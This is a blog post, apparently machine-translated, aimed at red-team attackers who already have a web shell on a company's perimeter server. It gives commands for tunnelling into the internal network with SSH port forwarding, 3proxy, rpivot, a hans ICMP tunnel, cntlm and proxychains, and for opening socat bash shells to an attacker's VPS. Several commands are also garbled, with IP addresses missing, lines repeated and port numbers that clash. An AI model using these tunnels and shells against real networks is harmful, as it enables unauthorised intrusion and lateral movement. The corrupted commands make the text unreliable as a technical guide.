posture across the border

Posted by tzul at 2020-04-03

In the enterprise security confrontation, the red side attack team often encounter this situation. They get some permissions on the enterprise network boundary, such as a web server's Web shell. However, how can they more easily penetrate the next step? How to test the penetration of the internal network, we need tunnel forwarding technology, through the border firewall, security agents and other security equipment, to carry out deep security testing. The main content of this paper is to penetrate the various positions of the intranet.

Typical boundary network architecture

Using SSH to build tunnel

Dynamic port forwarding

Principle: establish a dynamic Socks4 / 5 proxy channel, followed by the port number of local monitoring; dynamic port forwarding is to establish a SSH encrypted Socks4 / 5 proxy channel, which can be used by any program supporting the Socks4 / 5 protocol for proxy access.

Local execution command:

ssh -D 1080 [email protected]

Effect: listen to port 1080 locally. We can use the application with the functions of socks port. We can access the Internet through agent: If we have to use it in the target intranet,

It can be executed on server B:

ssh -D 1080 [email protected]

In this way, we can access the office network resources through port 1080 of server B. If the SSH of serverb is accessible,

Can be performed locally:

ssh -D 1080 [email protected]

In this way, we can access the target intranet resources through local

Local port forwarding

Principle: forward a port of the local machine (client) to the specified port of the remote specified machine; local port forwarding is to monitor a port on the localhost, and all data accessing the port will be transmitted to the corresponding port of the remote through the SSH tunnel.

On serverb:

ssh -L 7001:localhost:7070 [email protected]

Function: serverb listens for port 7001 and forwards the data of port 7001 to port 7070 of VPS

Use: run a socks agent on serverb, set the proxy port to 7001, and then execute the above command, so we are equivalent to building a Socks5 tunnel.

Remote port forwarding

Principle: forward a port of the remote host (server) to the specified port of the local specified machine; remote port forwarding is to listen to a port on the remote host, and all data accessing the specified port of the remote server will be transmitted to the local corresponding port through SSH tunnel.

On serverb:

localhost: ssh -R 1433:localhost:7070  root@

Function: forward port 3306 of to port 7070 of serverb, so when we access port 7070 of serverb, we actually access port 3306 of

Tunnel with 3proxy

brief introduction

Tool address:

3proxy is a multi platform proxy software developed by Russians, which supports HTTP / HTTPS / ftp / Socks4 / Socks5 / socks4a / socks5a and other proxy methods.

Utilization mode:

windows:3proxy.exe config_file linux:./3proxy config_file

This tool is mainly used to modify configuration files.

Set up socks agent

The configuration is as follows:

#!/usr/local/bin/3proxysocks -p1080

Function: create a new socks agent and listen to port 1080

Implement port forwarding

The configuration is as follows:

#!/usr/local/bin/3proxytcppm 1080 7070

Function: forward local port 1080 to port 7070 of VPS

You can learn other functions by yourself.

Port forwarding using Plink

Plink is similar to SSH, except that Plink runs under windows.

Using rpivot as reverse proxy

Tool address:

Utilization mode:


python --proxy-port 1080 --server-port 9999 --server-ip

Function: create a Socks4 agent on VPS on port 1080 and listen to port 9999


python --server-ip --server-port 9999

Function: connect to 9999 port of VPS, we can access the target intranet through 1080 port of VPS.

Establish ICMP tunnel

Tool address:

Download compilation on serverb

Execute with root:

1 echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

2 ./hans -s -p password

2 ./hans -s -p password

Execute locally:

./hans -f -c  -p password -v

Will return a shell

Penetration proxy

Condition: serverb needs to pass the Internet of servera, the proxy server, and the authentication of the proxy server requires domain authentication


You can use the following command to achieve penetration:

If the obtained user password is a hash and cannot be solved:


Tool address:

Principle: forward the port of the remote server to the local through the intranet NTLM authentication agent.

For usage, execute on serverb:

windows: cntlm.exe -c config.conf

linux:./cntlm -c config.conf

Sample configuration file:

Function: the intranet server accesses port 2222 of serverb, that is, port 443 of VPS.

Access intranet through socks proxy


Suppose the proxy address is

Modify the configuration file to set the proxy address as the address of the proxy server as follows:

vim /etc/proxychains.conf socks5 1080

usage method:

proxychains [email protected] ipconfig nc -vv -l -p 4444

On serverb:


Forward shell

Execute listening on VPS port 1337:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

On serverb:

socat FILE:`tty`,raw,echo=0 TCP: socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On serverb:

socat TCP4: EXEC:bash,pty,stderr,setsid,sigint,sane